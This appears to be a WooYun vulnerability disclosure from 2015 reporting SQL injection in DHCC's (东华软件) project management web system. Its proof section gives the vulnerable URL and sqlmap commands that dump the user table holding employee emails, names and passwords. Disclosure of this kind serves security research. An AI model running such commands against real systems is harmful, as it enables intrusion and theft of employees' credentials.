当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127977

漏洞标题:东华软件某项目管理系统存在SQL注入漏洞

相关厂商:东华软件

漏洞作者: 路人甲

提交时间:2015-07-28 13:45

修复时间:2015-09-11 13:46

公开时间:2015-09-11 13:46

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入,可以获取东华软件1000多员工信息,保护账户邮箱姓名和密码

详细说明:

东华软件股份公司(原北京东华合创数码科技股份有限公司于2009年5月更名)成立于2001年1月,是深圳证券交易所的上市公司。股票简称"东华软件",股票代码002065,注册资金15亿元人民币。在北京及全国拥有30余家分支机构,员工规模超过5000人。东华软件以应用软件开发、计算机信息系统集成、信息技术服务及网络流控安全产品为主要业务,拥有近600项自主知识产权的软件产品,是国家规划布局内的重点软件企业,国家火炬计划重点高新技术企业,国内最早通过软件能力成熟度集成(CMMI)5级认证的软件企业之一,连续多年被工业和信息化部评为中国自主软件产品前十家企业。
东华自成立以来,不断加强技术创新,产品创新和业务模式创新的力度。已为数千个用户提供了优秀的软件和信息系统解决方案,涵盖多种应用与技术平台,用户遍布电信、电力、政府、交通、国防、医疗、金融、科研、煤炭、石化、石油、保险及制造等行业,成功完成了国家电网公司、华夏银行、山西移动通信公司、中石油股份公司、贵阳市公安局、江苏中烟工业公司、中国国际航空公司、水利部、国家气象局、北京协和医院、中国人寿保险公司等客户的堪称业界典范的应用软件开发和计算机信息系统集成项目。
作为专业信息技术服务供应商,东华十分注重同业界各类知名IT厂商建立和保持良好的合作关系,通过共享市场资源与技术资源跟踪最新的技术发展趋势与市场动态,把国内外先进的技术和产品用一流的服务带给用户。多年良好的业绩及服务已经得到众多厂家的信任与认可,目前,东华已成为数十家国际国内知名IT企业的增值代理商、系统集成商或战略合作伙伴,为向用户提供全面解决方案及优质服务奠定了坚实的基础。
通过测试

http://pm.dhcc.com.cn/DHCPMWeb/

系统存在SQL注入漏洞

漏洞证明:

漏洞地址

http://pm.dhcc.com.cn/DHCPMWeb/DJ/bxdjdisplay.jsp?RWDNO=20090304000017&SQRNO=10193&BXNO=BX2010001221


SQLMAP 参数
sqlmap -u"http://pm.dhcc.com.cn/DHCPMWeb/DJ/bxdjdisplay.jsp?RWDNO=20090304000017&SQRNO=10193&BXNO=BX2010001221" --level=5
执行--current-db

1.PNG


执行--dump -T"DHCPM_USERS_T" -D"dhcpm"

2.PNG


登陆业务系统

3.PNG

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝